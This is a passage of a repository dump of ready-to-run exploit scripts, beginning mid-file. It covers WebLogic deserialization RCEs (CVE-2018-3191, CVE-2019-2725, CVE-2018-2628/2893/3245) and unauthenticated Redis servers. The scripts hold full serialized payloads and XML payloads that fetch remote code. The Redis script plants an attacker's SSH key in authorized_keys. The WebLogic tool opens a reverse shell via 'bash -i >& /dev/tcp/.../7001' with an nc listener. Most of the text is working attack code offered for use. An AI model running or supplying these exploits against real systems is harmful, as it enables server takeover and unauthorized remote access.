\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78' 243 | # adjust header for appropriate message length 244 | payload=struct.pack('>I',len(payload)) + payload[4:] 245 | print '[+] Payload sent!' 246 | try: 247 | sock.send(payload) 248 | data = sock.recv(1024) 249 | except: 250 | sock.close() 251 | except IndexError: 252 | print "Usage: python cve-2018-3191.py -c '' " 253 | print "For SSL: python cve-2018-3191.py -c '' -ssl" 254 | 255 | except IndexError: 256 | general_usage() 257 | -------------------------------------------------------------------------------- /cve-2018-3191/weblogic-spring-jndi-10.3.6.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/buffered4ever/Exploits/3a52927353dca644389b6614f4493ad808adc155/cve-2018-3191/weblogic-spring-jndi-10.3.6.0.jar -------------------------------------------------------------------------------- /cve-2018-3191/ysoserial-master-ecc60747a5-1.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/buffered4ever/Exploits/3a52927353dca644389b6614f4493ad808adc155/cve-2018-3191/ysoserial-master-ecc60747a5-1.jar -------------------------------------------------------------------------------- /cve-2019-2725/README.md: -------------------------------------------------------------------------------- 1 | Usage: 2 | 3 | Option 1: Using Class java.lang.ProcessBuilder 4 | python3.6 cve-2019-2725.py 1 5 | 6 | Option 2: Using Class com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext 7 | python3.6 cve-2019-2725.py 2 8 | 9 | Option 3: Using Class oracle.toplink.internal.sessions.UnitOfWorkChangeSet 10 | python3.6 cve-2019-2725.py 3 11 | Setup a webserver hosting the file payload.xml at LHOST on LPORT 12 | -------------------------------------------------------------------------------- /cve-2019-2725/cve-2019-2725.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # This code exploits the CVE-2019-2725 unauthenticated RCE vulnerability in WebLogic 4 | 5 | # The vulnerability affects supported versions: 6 | # 10.3.6.0, 12.1.3.0 7 | #Tested on docker https://hub.docker.com/r/ismaleiva90/weblogic12/ (12.1.3.0) 8 | #Tested on docker https://hub.docker.com/r/zhiqzhao/ubuntu_weblogic1036_domain/ (10.3.6.0) 9 | 10 | # Information for building the exploit was taken from here: 11 | #https://paper.seebug.org/910/ 12 | #https://devcentral.f5.com/s/articles/oracle-weblogic-deserialization-remote-code-execution-34185 13 | #https://www.f5.com/labs/articles/threat-intelligence/vulnerabilities--exploits--and-malware-driving-attack-campaigns-in-april-2019 14 | 15 | # Dunstan Pinto, 18/5/2019 (dunstan.pinto@gmail.com) 16 | import os 17 | import sys 18 | import requests 19 | import time 20 | 21 | 22 | 23 | 24 | def gen_payload1(): 25 | payload="\r\n \r\n xx\r\n xx\r\n \r\n \r\n \r\n \r\n touch\r\n \r\n \r\n /tmp/test\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n" 26 | return payload 27 | 28 | def gen_payload2(file): 29 | _payload = open(file, 'rb').read() 30 | _payload = bytearray(_payload) 31 | #print(_payload) 32 | payloads = "" 33 | payloads += ''' xxxx 34 | oracle.toplink.internal.sessions.UnitOfWorkChangeSet''' 35 | payloads += f'\n' 36 | for i, v in enumerate(_payload): 37 | if v > 128: 38 | payloads += f'\n{v-256}' 39 | else: 40 | payloads += f'\n{v}' 41 | payloads += ''' 42 | 43 | 44 | 45 | ''' 46 | return payloads 47 | 48 | def ysoserial(DNSURL): 49 | ysoserial_payload = f'java -jar ysoserial-0.0.6-SNAPSHOT-BETA-all.jar URLDNS {DNSURL} > weblogic_payload' 50 | os.system(ysoserial_payload) 51 | 52 | def rce(url,DNSURL): 53 | ysoserial(DNSURL) 54 | payloads = gen_payload2(os.path.join(os.getcwd(), 'weblogic_payload')) 55 | headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Content-Type": "text/xml"} 56 | res2 = requests.post(url, headers=headers, data=payloads) 57 | return res2 58 | 59 | def gen_payload3(LHOST,LPORT): 60 | payload = "" 61 | payload += ''' xxxx 62 | com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContexthttp://{0}:{1}/payload.xml 63 | '''.format(LHOST,LPORT) 64 | return payload 65 | 66 | 67 | if __name__ == '__main__': 68 | try: 69 | request_headers = {"Accept-Encoding": "gzip, deflate", "Accept": "*/*", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Connection": "close", "Content-Type": "text/xml"} 70 | 71 | url = "http://{0}:{1}/_async/AsyncResponseService".format(sys.argv[1],sys.argv[2]) 72 | 73 | method = sys.argv[3] 74 | 75 | if method == "1": 76 | try: 77 | print("Exploiting CVE-2019-2725 using class 'java.lang.ProcessBuilder'") 78 | print("Running the command 'touch /tmp/test'") 79 | payload=gen_payload1() 80 | response = requests.post(url, headers=request_headers, data=payload) 81 | 82 | if str(response.status_code)=="202": 83 | print("Created a file at /tmp/test. Check the /tmp directory to confirm.") 84 | else: 85 | print("Server not vulnerable to CVE-2019-2725") 86 | except: 87 | print("Usage: python3.6 cve-2019-2725.py 1") 88 | 89 | 90 | elif method == "2": 91 | try: 92 | DNSURL = sys.argv[4] 93 | print("Exploiting CVE-2019-2725 using class 'com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext'") 94 | print("Performing DNS lookup for URL {0}".format(DNSURL)) 95 | rce(url,DNSURL) 96 | print("Done!") 97 | 98 | except: 99 | print("Usage: python3.6 cve-2019-2725.py 2 ") 100 | 101 | elif method == "3": 102 | try: 103 | LHOST = sys.argv[4] 104 | LPORT = sys.argv[5] 105 | print("Exploiting CVE-2019-2725 using class 'oracle.toplink.internal.sessions.UnitOfWorkChangeSet'") 106 | payload=gen_payload3(LHOST,LPORT) 107 | res = requests.post(url, headers=request_headers, data=payload) 108 | 109 | if str(res.status_code)=="202": 110 | print("Created a file at /tmp/GIS. Check the /tmp directory to confirm.") 111 | else: 112 | print("Server not vulnerable to CVE-2019-2725") 113 | except: 114 | print("Usage: python3.6 cve-2019-2725.py 3 ") 115 | print("Setup a webserver hosting the file payload.xml at LHOST on LPORT") 116 | else: 117 | print("Option 1: Using Class java.lang.ProcessBuilder") 118 | print("Usage: python3.6 cve-2019-2725.py 1") 119 | print("\n") 120 | print("Option 2: Using Class com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext") 121 | print("Usage: python3.6 cve-2019-2725.py 2 ") 122 | print("\n") 123 | print("Option 3: Using Class oracle.toplink.internal.sessions.UnitOfWorkChangeSet") 124 | print("Usage: python3.6 cve-2019-2725.py 3 ") 125 | print("Setup a webserver hosting the file payload.xml at LHOST on LPORT") 126 | 127 | except: 128 | print("Option 1: Using Class java.lang.ProcessBuilder") 129 | print("Usage: python3.6 cve-2019-2725.py 1") 130 | print("\n") 131 | print("Option 2: Using Class com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext") 132 | print("Usage: python3.6 cve-2019-2725.py 2 ") 133 | print("\n") 134 | print("Option 3: Using Class oracle.toplink.internal.sessions.UnitOfWorkChangeSet") 135 | print("Usage: python3.6 cve-2019-2725.py 3 ") 136 | print("Setup a webserver hosting the file payload.xml at LHOST on LPORT") 137 | 138 | 139 | -------------------------------------------------------------------------------- /cve-2019-2725/payload.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 9 | touch 10 | /tmp/test 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /redis/README.md: -------------------------------------------------------------------------------- 1 | Usage: 2 | 3 | Write to the file system 4 | python redis.py -write 5 | for e.g.: python redis.py 172.17.0.2 6379 -write /tmp/test.txt 6 | 7 | Generate ssh key pairs and write to the authorized_keys files and get ssh access to the server. 8 | python redis.py -ssh 9 | for e.g.: python redis.py 172.17.0.2 6379 -ssh root 10 | 11 | -------------------------------------------------------------------------------- /redis/redis.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # This code exploits unauthenticated redis servers 3 | 4 | # http://antirez.com/news/96 5 | # https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419 6 | # https://github.com/Avinash-acid/Redis-Server-Exploit 7 | # Dunstan Pinto, 26/9/2018 (dunstan.pinto@gmail.com) 8 | 9 | 10 | 11 | import os 12 | from sys import argv 13 | from termcolor import colored 14 | import ntpath 15 | 16 | 17 | PATH='/usr/bin/redis-cli' 18 | PATH1='/usr/local/bin/redis-cli' 19 | 20 | 21 | def redis_ssh(ip_address,port,switch,user): 22 | if os.path.isfile(PATH) or os.path.isfile(PATH1): 23 | try: 24 | print colored("SSH Keys Need to be Generated", 'green') 25 | os.system('ssh-keygen -t rsa -C {0} -f id_rsa'.format(user)) 26 | print colored("Keys Generated Successfully", "blue") 27 | os.system("(echo \'\r\n\'; cat id_rsa.pub; echo \'\r\n\') > public_key.txt") 28 | cmd = 'redis-cli -h ' + ip_address + ' -p ' + port + ' flushall' 29 | 30 | cmd1 = 'redis-cli -h ' + ip_address + ' -p ' + port 31 | os.system(cmd) 32 | cmd2 = "cat public_key.txt | redis-cli -h {0} -p {1} -x set s-key".format(ip_address,port) 33 | os.system(cmd2) 34 | cmd3 = cmd1 + ' config set dbfilename "backup.db" ' 35 | if user!="root": 36 | cmd4 = cmd1 + ' config set dir /home/{0}/.ssh/'.format(user) 37 | else: 38 | cmd4 = cmd1 + ' config set dir /root/.ssh/' 39 | cmd5 = cmd1 + ' config set dbfilename authorized_keys ' 40 | cmd6 = cmd1 + ' save' 41 | os.system(cmd3) 42 | print colored("Trying to change dir to .ssh under the user's home directory", "green") 43 | os.system(cmd4) 44 | print colored("Saving our generated public key in the 'authorized_keys' file", "green") 45 | os.system(cmd5) 46 | os.system(cmd6) 47 | print colored("Connecting to the target server using SSH public key authentication. If all works, you should get a shell!", "green") 48 | shell = "ssh -i id_rsa {0}@{1}".format(user,ip_address) 49 | os.system(shell) 50 | os.system("rm id_rsa id_rsa.pub public_key.txt") 51 | except: 52 | print colored("Something went wrong!", "red") 53 | else: 54 | print colored("Redis-cli is not present on your system. You need to install it to proceed further.", "red") 55 | 56 | def redis_write(ip_address,port,switch,path): 57 | if os.path.isfile(PATH) or os.path.isfile(PATH1): 58 | try: 59 | os.system("echo 'This is a test file to demonstrate unauthenticated write access using redis' > temp.txt") 60 | cmd = 'redis-cli -h ' + ip_address + ' -p ' + port + ' flushall' 61 | 62 | cmd1 = 'redis-cli -h ' + ip_address + ' -p ' + port 63 | os.system(cmd) 64 | cmd2 = "cat temp.txt | redis-cli -h {0} -p {1} -x set s-key".format(ip_address,port) 65 | os.system(cmd2) 66 | cmd3 = cmd1 + ' config set dbfilename "backup.db" ' 67 | head, tail = ntpath.split(path) 68 | cmd4 = cmd1 + ' config set dir {0}'.format(head) 69 | cmd5 = cmd1 + ' config set dbfilename {0} '.format(tail) 70 | cmd6 = cmd1 + ' save' 71 | os.system(cmd3) 72 | print colored("Trying to write to a file at path {0}".format(path), "green") 73 | os.system(cmd4) 74 | os.system(cmd5) 75 | os.system(cmd6) 76 | print colored("File written to path {0}. Ask the project team to confirm".format(path), "green") 77 | os.system("rm temp.txt") 78 | except: 79 | print colored("Something went wrong!", "red") 80 | else: 81 | print colored("Redis-cli is not present on your system. You need to install it to proceed further.", "red") 82 | 83 | if __name__=="__main__": 84 | try: 85 | ip_address = argv[1] 86 | port = argv[2] 87 | switch = argv[3] 88 | if switch == '-ssh': 89 | try: 90 | user = argv[4] 91 | print 'Exploiting redis to get a shell using ssh' 92 | redis_ssh(ip_address,port,switch,user) 93 | except IndexError: 94 | print 'Usage: python redis.py -ssh ' 95 | elif switch == '-write': 96 | try: 97 | path = argv[4] 98 | print 'Exploiting redis to write to a file at '+argv[4] 99 | redis_write(ip_address,port,switch,path) 100 | except IndexError: 101 | print "Usage: python redis.py -write " 102 | except IndexError: 103 | print "Use the -shell switch to exploit redis to get a shell using ssh, for e.g.: python redis.py -ssh " 104 | print "Use the -write switch to exploit redis to write to a file, for e.g.: python redis.py -write " 105 | -------------------------------------------------------------------------------- /weblogic_dser/README.md: -------------------------------------------------------------------------------- 1 | This code exploits the CVE-2018-2628, CVE-2018-2893 and CVE-2018-3245 unauthenticated RCE vulnerability in WebLogic 2 | 3 | Usage: 4 | 5 | To run arbitrary commands 6 | python weblogic_dser.py -c '' 7 | 8 | To get a reverse shell 9 | python weblogic_dser.py -rs 10 | -------------------------------------------------------------------------------- /weblogic_dser/weblogic_dser.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | # This code exploits the CVE-2018-2628, CVE-2018-2893 and CVE-2018-3245 unauthenticated RCE vulnerability in WebLogic 4 | # 5 | # 6 | # http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html 7 | # https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html 8 | # https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html 9 | # https://www.waratek.com/oracle-weblogic-rce-deserialization-vulnerability-cve-2018-2628-analysis/ 10 | # https://github.com/pyn3rd/CVE-2018-3245 11 | # The vulnerability affects supported versions: 12 | # 10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 13 | #Tested on docker https://hub.docker.com/r/ismaleiva90/weblogic12/ (12.1.3.0) 14 | #Tested on docker https://hub.docker.com/r/zhiqzhao/ubuntu_weblogic1036_domain/ (10.3.6.0) 15 | 16 | # Information for building the exploit was taken from here: https://github.com/MrTcsy/Exploit 17 | # The exploit works with 'ysoserial-cve-2018-3245.jar' which is a modified version of ysoserial catered to the weblogic deserialization vulnerabilities 18 | # More details can be found here: https://github.com/pyn3rd/CVE-2018-3245 19 | 20 | # Dunstan Pinto, 31/10/2018 (dunstan.pinto@gmail.com) 21 | 22 | 23 | import socket 24 | import sys 25 | import time 26 | import os 27 | import re 28 | 29 | def t3_handshake(sock,server_addr): 30 | sock.connect(server_addr) 31 | sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex')) 32 | time.sleep(1) 33 | sock.recv(1024) 34 | print 't3 handshake successful' 35 | 36 | def build_t3_request_object(sock, port): 37 | data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371' 38 | data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport)) 39 | data3 = '1a7727000d3234322e323134' 40 | data4 = '2e312e32353461863d1d0000000078' 41 | for d in [data1,data2,data3,data4]: 42 | sock.send(d.decode('hex')) 43 | time.sleep(5) 44 | print 'send t3 request object successful,recv length:%d'%(len(sock.recv(2048))) 45 | 46 | 47 | def send_payload_objdata(sock,data): 48 | payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' 49 | payload+=data 50 | payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff' 51 | payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload) 52 | sock.send(payload.decode('hex')) 53 | time.sleep(2) 54 | sock.send(payload.decode('hex')) 55 | res = '' 56 | try: 57 | while True: 58 | res += sock.recv(4096) 59 | time.sleep(0.1) 60 | except Exception as e: 61 | pass 62 | return res 63 | 64 | 65 | #function to get a reverse shell 66 | def rs(dip,dport,switch,sip): 67 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 68 | sock.settimeout(50) 69 | server_addr = (dip, dport) 70 | print "Select the weblogic deserialization exploit" 71 | jpayload = raw_input("1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245\n") 72 | if jpayload == '1': 73 | print "Exploiting CVE-2018-2628" 74 | t3_handshake(sock,server_addr) 75 | build_t3_request_object(sock,dport) 76 | print 'Generating ysoserial payload for CVE-2018-2628' 77 | os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{}/7001 0>&1\"'".format(sip)) 78 | time.sleep(3) 79 | print 'Trying to get a reverse shell' 80 | PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_1 {}:1099 | xxd -p -c 1000000").format(sip)).read() 81 | PAYLOAD=PAYLOAD.strip() 82 | print 'Sending final payload' 83 | #spawning a new terminal window for the netcat listener 84 | os.system("mate-terminal --command 'nc -lvp 7001'") 85 | send_payload_objdata(sock,PAYLOAD) 86 | print 'Exploit completed Successfully' 87 | if jpayload == '2': 88 | print "Exploiting CVE-2018-2893" 89 | t3_handshake(sock,server_addr) 90 | build_t3_request_object(sock,dport) 91 | print 'Generating ysoserial payload for CVE-2018-2893' 92 | os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{}/7001 0>&1\"'".format(sip)) 93 | time.sleep(3) 94 | print 'Trying to get a reverse shell' 95 | PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_3 {}:1099 | xxd -p -c 1000000").format(sip)).read() 96 | PAYLOAD=PAYLOAD.strip() 97 | print 'Sending final payload' 98 | #spawning a new terminal window for the netcat listener 99 | os.system("mate-terminal --command 'nc -lvp 7001'") 100 | send_payload_objdata(sock,PAYLOAD) 101 | print 'Exploit completed Successfully' 102 | if jpayload == '3': 103 | print "Exploiting CVE-2018-3245" 104 | t3_handshake(sock,server_addr) 105 | build_t3_request_object(sock,dport) 106 | print 'Generating ysoserial payload for CVE-2018-3245' 107 | os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"bash -c $@|bash . echo bash -i >& /dev/tcp/{}/7001 0>&1\"'".format(sip)) 108 | time.sleep(3) 109 | print 'Trying to get a reverse shell' 110 | PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 {}:1099 | xxd -p -c 1000000").format(sip)).read() 111 | PAYLOAD=PAYLOAD.strip() 112 | print 'Sending final payload' 113 | #spawning a new terminal window for the netcat listener 114 | os.system("mate-terminal --command 'nc -lvp 7001'") 115 | send_payload_objdata(sock,PAYLOAD) 116 | print 'Exploit completed Successfully' 117 | else: 118 | print "Select the correct option\n1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245" 119 | 120 | #function to run arbitrary commands on the server 121 | def run(dip,dport,switch,cmd,sip): 122 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 123 | sock.settimeout(50) 124 | server_addr = (dip, dport) 125 | print "Select the weblogic deserialization exploit" 126 | jpayload = raw_input("1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245\n") 127 | if jpayload == '1': 128 | print "Exploiting CVE-2018-2628" 129 | t3_handshake(sock,server_addr) 130 | build_t3_request_object(sock,dport) 131 | print 'Generating ysoserial payload for CVE-2018-2628' 132 | os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd)) 133 | time.sleep(3) 134 | print 'Trying to run the command '+sys.argv[4] 135 | PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_1 {}:1099 | xxd -p -c 1000000").format(sip)).read() 136 | PAYLOAD=PAYLOAD.strip() 137 | print 'Sending final payload' 138 | evil_return_data = send_payload_objdata(sock,PAYLOAD) 139 | print 'Exploit completed Successfully' 140 | if jpayload == '2': 141 | print "Exploiting CVE-2018-2893" 142 | t3_handshake(sock,server_addr) 143 | build_t3_request_object(sock,dport) 144 | print 'Generating ysoserial payload for CVE-2018-2893' 145 | os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd)) 146 | time.sleep(3) 147 | print 'Trying to run the command '+sys.argv[4] 148 | PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_2893_3 {}:1099 | xxd -p -c 1000000").format(sip)).read() 149 | PAYLOAD=PAYLOAD.strip() 150 | print 'Sending final payload' 151 | evil_return_data = send_payload_objdata(sock,PAYLOAD) 152 | print 'Exploit completed Successfully' 153 | if jpayload == '3': 154 | print "Exploiting CVE-2018-3245" 155 | t3_handshake(sock,server_addr) 156 | build_t3_request_object(sock,dport) 157 | print 'Generating ysoserial payload for CVE-2018-3245' 158 | os.system("mate-terminal --command 'java -cp ysoserial-cve-2018-3245.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 \"{}\"'".format(cmd)) 159 | time.sleep(3) 160 | print 'Trying to run the command '+sys.argv[4] 161 | PAYLOAD=os.popen(("java -jar ysoserial-cve-2018-3245.jar CVE_2018_3245 {}:1099 | xxd -p -c 1000000").format(sip)).read() 162 | PAYLOAD=PAYLOAD.strip() 163 | print 'Sending final payload' 164 | send_payload_objdata(sock,PAYLOAD) 165 | print 'Exploit completed Successfully' 166 | else: 167 | print "Select the correct option\n1. CVE-2018-2628\n2. CVE-2018-2893\n3. CVE-2018-3245" 168 | 169 | 170 | if __name__=="__main__": 171 | try: 172 | dip = sys.argv[1] 173 | dport = int(sys.argv[2]) 174 | switch = sys.argv[3] 175 | if switch == '-rs': 176 | try: 177 | sip = sys.argv[4] 178 | rs(dip,dport,switch,sip) 179 | except IndexError: 180 | print 'Usage: python weblogic_dser.py -rs ' 181 | elif switch == '-c': 182 | try: 183 | 184 | cmd = sys.argv[4] 185 | sip = sys.argv[5] 186 | 187 | run(dip,dport,switch,cmd,sip) 188 | except IndexError: 189 | print "Usage: python weblogic_dser.py -c '' " 190 | else: 191 | print "Use the -c switch to execute an arbitrary command on the weblogic server, for e.g.: python weblogic_dser.py -c ''" 192 | print "Use the -rs switch to get a reverse shell, for e.g.: python weblogic_dser.py -rs " 193 | except IndexError: 194 | print "Use the -c switch to execute an arbitrary command on the weblogic server, for e.g.: python weblogic_dser.py -c ''" 195 | print "Use the -rs switch to get a reverse shell, for e.g.: python weblogic_dser.py -rs " 196 | 197 | 198 | 199 | -------------------------------------------------------------------------------- /weblogic_dser/ysoserial-cve-2018-3245.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/buffered4ever/Exploits/3a52927353dca644389b6614f4493ad808adc155/weblogic_dser/ysoserial-cve-2018-3245.jar --------------------------------------------------------------------------------